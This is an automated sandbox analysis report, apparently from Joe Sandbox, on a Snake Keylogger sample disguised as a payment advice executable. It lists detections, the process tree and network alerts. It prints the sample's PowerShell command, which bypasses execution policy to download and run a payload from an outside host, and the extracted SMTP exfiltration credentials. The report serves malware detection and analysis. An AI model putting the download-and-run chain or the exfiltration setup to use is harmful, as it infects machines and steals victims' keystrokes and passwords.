
Windows Analysis Report
Payment_Advice.exe

Overview

General Information

Sample name: Payment_Advice.exe
Analysis ID: 1434636
MD5: e708aa3160e224de971421d5bc2fee29
SHA1: 7db6e4d3e5e2db1cd12717fa9a62a35a52834c02
SHA256: ba78d6ffbd1bd564598b33a3d28d437b3fe7129ffb93dee80e732e44098b9aa9
Tags: exe

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payment_Advice.exe (PID: 1228 cmdline: "C:\Users\user\Desktop\Payment_Advice.exe" MD5: E708AA3160E224DE971421D5BC2FEE29)
    • Payment_Advice.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\Payment_Advice.exe" MD5: E708AA3160E224DE971421D5BC2FEE29)
      • wscript.exe (PID: 2436 cmdline: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 4912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 5760 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 2928 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7348 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • hadvices.scr (PID: 3024 cmdline: "C:\Windows\Temp\hadvices.scr" /S MD5: 012DE24142F859797FBB5A25A7A3290D)
            • hadvices.scr (PID: 8336 cmdline: "C:\Windows\Temp\hadvices.scr" MD5: 012DE24142F859797FBB5A25A7A3290D)
  • svchost.exe (PID: 7176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Extracted malware configuration (Snake Keylogger): {"Exfil Mode": "SMTP", "Username": "test@qoldenfrontier.com", "Password": "%2WMoWREUv@3", "Host": "mail.qoldenfrontier.com", "Port": "587"}
Yara matches (Source / Rule / Description / Author / Strings)

Sample:
Source: Payment_Advice.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

PCAP:
Source: dump.pcap | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security

Dropped files:
Source: C:\Windows\Temp\hadvices.scr | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

Memory dumps:
Source: 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmp | Rule: MALWARE_Win_DLInjector02 | Description: Detects downloader injector | Author: ditekSHen
  • 0x3546d:$x1: In$J$ct0r
Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
  • 0x14857:$a1: get_encryptedPassword
  • 0x14b4d:$a2: get_encryptedUsername
  • 0x14663:$a3: get_timePasswordChanged
  • 0x1475e:$a4: get_passwordField
  • 0x1486d:$a5: set_encryptedPassword
  • 0x15ebf:$a7: get_logins
  • 0x15e22:$a10: KeyLoggerEventArgs
  • 0x15abb:$a11: KeyLoggerEventArgsEventHandler
Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: MALWARE_Win_SnakeKeylogger | Description: Detects Snake Keylogger | Author: ditekSHen
  • 0x181b8:$x1: $%SMTPDV$
  • 0x1821c:$x2: $#TheHashHere%&
  • 0x19899:$x3: %FTPDV$
  • 0x1998d:$x4: $%TelegramDv$
  • 0x15abb:$x5: KeyLoggerEventArgs
  • 0x15e22:$x5: KeyLoggerEventArgs
  • 0x198bd:$m2: Clipboard Logs ID
  • 0x19a89:$m2: Screenshot Logs ID
  • 0x19b55:$m2: keystroke Logs ID
  • 0x19a61:$m4: \SnakeKeylogger\

Unpacked PEs:
Source: 23.2.hadvices.scr.3e03d90.4.unpack | Rule: MALWARE_Win_DLInjector02 | Description: Detects downloader injector | Author: ditekSHen
  • 0x48e6b:$x1: In$J$ct0r
Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack | Rule: MALWARE_Win_DLInjector02 | Description: Detects downloader injector | Author: ditekSHen
  • 0x3546d:$x1: In$J$ct0r
Source: 0.2.Payment_Advice.exe.404e590.3.unpack | Rule: MALWARE_Win_DLInjector02 | Description: Detects downloader injector | Author: ditekSHen
  • 0x3366d:$x1: In$J$ct0r
Source: 0.2.Payment_Advice.exe.31018e4.0.raw.unpack | Rule: MALWARE_Win_DLInjector02 | Description: Detects downloader injector | Author: ditekSHen
  • 0x165dc:$x1: In$J$ct0r
  • 0x182d0:$a1: WriteProcessMemory
  • 0x1835c:$a1: WriteProcessMemory
  • 0x18430:$a4: VirtualAllocEx
  • 0x18654:$a4: VirtualAllocEx
  • 0x186d4:$a4: VirtualAllocEx
  • 0x16894:$s3: net.pipe
  • 0x168b4:$s4: vsmacros
Source: 0.2.Payment_Advice.exe.31018e4.0.unpack | Rule: MALWARE_Win_DLInjector02 | Description: Detects downloader injector | Author: ditekSHen
  • 0x165dc:$x1: In$J$ct0r
  • 0x182d0:$a1: WriteProcessMemory
  • 0x1835c:$a1: WriteProcessMemory
  • 0x18430:$a4: VirtualAllocEx
  • 0x18654:$a4: VirtualAllocEx
  • 0x186d4:$a4: VirtualAllocEx
  • 0x16894:$s3: net.pipe
  • 0x168b4:$s4: vsmacros

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 4208, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ProcessId: 2436, ProcessName: wscript.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 4208, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ProcessId: 2436, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 4208, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ProcessId: 2436, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4912, TargetFilename: C:\Users\Public\Payment_Advice.pdf
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4912, TargetFilename: C:\Windows\Temp\hadvices.scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4912, TargetFilename: C:\Windows\Temp\hadvices.scr
Source: Network Connection | Author: frack113 | Data: DestinationIp: 108.167.142.65, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Temp\hadvices.scr, Initiated: true, ProcessId: 8336, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49743
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4912, TargetFilename: C:\Windows\Temp\hadvices.scr
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 4208, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ProcessId: 2436, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 4912, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7176, ProcessName: svchost.exe
Snort IDS alerts:
Timestamp: 05/01/24-15:18:36.864942 | SID: 2044767 | Source Port: 49745 | Destination Port: 587 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/01/24-15:18:34.721845 | SID: 2044767 | Source Port: 49744 | Destination Port: 587 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/01/24-15:18:41.126293 | SID: 2044767 | Source Port: 49747 | Destination Port: 587 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/01/24-15:18:39.013246 | SID: 2044767 | Source Port: 49746 | Destination Port: 587 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/01/24-15:18:23.398629 | SID: 2044767 | Source Port: 49743 | Destination Port: 587 | Protocol: TCP | Classtype: A Network Trojan was detected

            AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: http://mail.qoldenfrontier.com | Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk | Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS | Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk | Avira URL Cloud: Label: malware
Source: 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "test@qoldenfrontier.com", "Password": "%2WMoWREUv@3", "Host": "mail.qoldenfrontier.com", "Port": "587"}
Source: scratchdreams.tk | Virustotal: Detection: 17%
Source: advising-receipts.com | Virustotal: Detection: 13%
Source: https://advising-receipts.com | Virustotal: Detection: 9%
Source: http://advising-receipts.com | Virustotal: Detection: 13%
Source: https://scratchdreams.tk | Virustotal: Detection: 16%
Source: https://scratchdreams.tk/_send_.php?TS | Virustotal: Detection: 16%
Source: http://scratchdreams.tk | Virustotal: Detection: 17%
Source: C:\Windows\Temp\hadvices.scr | ReversingLabs: Detection: 70%
Source: C:\Windows\Temp\hadvices.scr | Virustotal: Detection: 34%
Source: Payment_Advice.exe | ReversingLabs: Detection: 28%
Source: C:\Windows\Temp\hadvices.scr | Joe Sandbox ML: detected
Source: Payment_Advice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49724 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.141.195:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.7:49740 version: TLS 1.2
Source: Payment_Advice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb | source: Payment_Advice.exe, 00000000.00000002.1199149404.00000000057B0000.00000004.08000000.00040000.00000000.sdmp, Payment_Advice.exe, 00000000.00000002.1198385946.0000000003011000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000017.00000002.1414670213.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \/.dll.pdb | source: Payment_Advice.exe, hadvices.scr.4.dr
